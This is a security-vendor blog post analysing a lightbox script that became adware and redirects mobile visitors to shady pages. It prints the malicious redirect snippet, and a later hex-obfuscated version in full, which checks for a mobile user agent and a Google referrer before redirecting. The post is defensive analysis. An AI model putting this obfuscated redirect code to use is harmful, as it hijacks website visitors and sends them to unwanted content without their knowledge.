• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Lightbox Adware - From Innocent Scripts to Malicious Redirects

Lightbox Adware – From Innocent Scripts to Malicious Redirects

June 17, 2019Cesar Anjos

FacebookTwitterSubscribe

It’s no news that webmasters commonly make use of external scripts to add more features to their site, but things can turn out for the worse quite easily.

What if other scripts start behaving the same?

What if they start to use your website to spread ransomware?

Visitors Redirected to Random Websites on Mobile

Recently, we received a case where visitors who accessed a site via mobile were redirected to various random sites.

Upon closer inspection, we found that the culprit was this external script:

Malicious snippet

This script is used quite frequently by various webmasters to provide easy Lightbox functionalities on their websites.

Dissecting the Script

A quick look at the script shows us that it instantly makes a call to another script:

hxxp://dimsemenov-static[.]s3-cdn[.]com/js/get-js.js

Now, after decoding the file we can see that this script does indeed provide Lightbox functionalities. It also has a very particular set of lines appended to it:

(window, document, window[window.popns || uF6x.A(1)]);

s3_cdn_com.config({

perpage: 1

}).add('hxxp://click[.]thebestoffer[.]gq/?utm_medium=6a9d4be48f9dd74ece2547f9a7d3ed068107809c&utm_campaign=js_1&1=&2=', {

device: 'mobile',

cookieExpires: 86400,

noReferer: true

});

This piece of code will redirect mobile users to hxxp://click[.]thebestoffer[.]gq/?utm_medium=6a9d4be48f9dd74ece2547f9a7d3ed068107809c&utm_campaign=js_1&1=&2=

From there, the visitor would be taken to various pages such as ones that display certain apps for download and install, or just random tech articles.

Pages with downloadable apps
Pages with downloadable apps

If the visitors choose to install any of those apps, they are then taken to the respective official store’s webpage for the app.

After some time, the script had already changed into a different campaign. Here we can see the contents:

var _0x3ae7=["\x65\x78\x70\x69\x72\x65\x73","\x6E\x75\x6D\x62\x65\x72","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x3D","\x3B\x20","\x63\x6F\x6F\x6B\x69\x65","\x28\x3F\x3A\x5E\x7C\x3B\x20\x29","\x5C\x24\x31","\x72\x65\x70\x6C\x61\x63\x65","\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29","\x6D\x61\x74\x63\x68","\x61","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x72\x65\x66","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x67\x6F\x77\x65\x73\x74\x63\x6F\x6F\x6B\x69\x65","\x74\x72\x75\x65","\x2F","\x72\x65\x66\x65\x72\x72\x65\x72","\x67\x6F\x6F\x67\x6C\x65\x2E","\x69\x6E\x64\x65\x78\x4F\x66","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x74\x65\x73\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x79\x6F\x75\x2E\x31\x67\x6F\x77\x65\x73\x74\x2E\x74\x6F\x70\x2F\x3F\x75\x74\x6D\x5F\x6D\x65\x64\x69\x75\x6D\x3D\x38\x37\x65\x34\x61\x64\x34\x65\x35\x38\x37\x64\x36\x61\x33\x63\x36\x36\x38\x65\x34\x64\x64\x61\x35\x37\x61\x33\x31\x65\x61\x36\x30\x61\x30\x32\x33\x35\x62\x32\x26\x75\x74\x6D\x5F\x63\x61\x6D\x70\x61\x69\x67\x6E\x3D\x31\x67\x6F\x77\x65\x73\x74"];function gowest_setCookie(_0x564cx2,_0x564cx3,_0x564cx4){_0x564cx4= _0x564cx4|| {};var _0x564cx5=_0x564cx4[_0x3ae7[0]];if( typeof _0x564cx5== _0x3ae7[1]&& _0x564cx5){var _0x564cx6= new Date();_0x564cx6[_0x3ae7[3]](_0x564cx6[_0x3ae7[2]]()+ _0x564cx5* 1000);_0x564cx5= _0x564cx4[_0x3ae7[0]]= _0x564cx6};if(_0x564cx5&& _0x564cx5[_0x3ae7[4]]){_0x564cx4[_0x3ae7[0]]= _0x564cx5[_0x3ae7[4]]()};_0x564cx3= encodeURIComponent(_0x564cx3);var _0x564cx7=_0x564cx2+ _0x3ae7[5]+ _0x564cx3;for(var _0x564cx8 in _0x564cx4){_0x564cx7+= _0x3ae7[6]+ _0x564cx8;var _0x564cx9=_0x564cx4[_0x564cx8];if(_0x564cx9!== true){_0x564cx7+= _0x3ae7[5]+ _0x564cx9}};document[_0x3ae7[7]]= _0x564cx7}function gowest_getCookie(_0x564cx2){var _0x564cxb=document[_0x3ae7[7]][_0x3ae7[12]]( new RegExp(_0x3ae7[8]+ _0x564cx2[_0x3ae7[10]](/([\.$?*|{}\(\)\[\]\\\/\+^])/g,_0x3ae7[9])+ _0x3ae7[11]));return _0x564cxb?decodeURIComponent(_0x564cxb[1]):undefined}function gowest_parseURL(_0x564cxd){var _0x564cxe=document[_0x3ae7[14]](_0x3ae7[13]);_0x564cxe[_0x3ae7[15]]= _0x564cxd;return _0x564cxe[_0x3ae7[16]]}function gowestnow(){if(!gowest_getCookie(_0x3ae7[17])){gowest_setCookie(_0x3ae7[17],_0x3ae7[18],{expires:3600* 24* 30,path:_0x3ae7[19]});var _0x564cx10=gowest_parseURL(document[_0x3ae7[20]]);if(_0x564cx10[_0x3ae7[22]](_0x3ae7[21])!=  -1){if(/Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Mobi/i[_0x3ae7[24]](navigator[_0x3ae7[23]])){location[_0x3ae7[10]](_0x3ae7[25])}}}}gowestnow()

This will redirect the visitor to: hxxps://you.1gowest[.]top/?utm_medium=87e4ad4e587d6a3c668e4dda57a31ea60a0235b2&utm_campaign=1gowest, which in turn will land the visitor to another shady looking page.

Is This Script Malicious?

In order to determine if this script behavior can be considered malicious or not, here is  a quick checklist:

  • Are visitors being redirected? Yes.
  • Is it targeting only mobile browsers? Yes.
  • Are visitors landing on pages that redirect to unwanted software on iTunes and Google Play stores? Yes.
  • Is it possible that the redirects may lead to malicious software or content? Yes.

So far, there hasn’t been anything extremely malicious, such as ransomware. However, this undesired redirect and the unclear communication of this “feature” by the script developers defines this as malicious behavior.

Why Would the Developer Add Malicious Redirects?

It’s always hard to make a buck on software. It’s even harder when you are providing it for free. In those cases, including paid advertisement is the easiest way for the developer to generate revenue on the downloaded tool, app, or script.

Sometimes the developer may include ads from networks that don’t filter malicious campaigns properly, causing problems as described here. Or the tool may become popular and sold to a not so well-intended group that may add malicious code as a new “feature” on the next update.

Conclusion

It’s important that webmasters are mindful of every external asset added to the website. They should understand that those assets can very quickly turn against you—damaging the visitor experience and your site’s reputation.

This is not the first time we’ve seen apparently legitimate assets going to the dark side. Here are some previous cases in which scripts became malicious redirects:

  • SweetCAPTCHA Returns Hijacking Another Plugin
  • When Your Plugins Turn Against You
  • When a WordPress Plugin Goes Bad
  • SweetCAPTCHA Service Used to Distribute Adware


If you are looking for peace of mind, we recommend adding your website to our website security platform that includes malware detection, protection, and response in case of a website hack.

FacebookTwitterSubscribe

Categories: Security Advisory, Website Malware Infections, Website SecurityTags: Hacked Websites, Redirects

About Cesar Anjos

Cesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities include keeping up with the latest malware and writing about it. His professional experience covers over five years in the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him on our Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.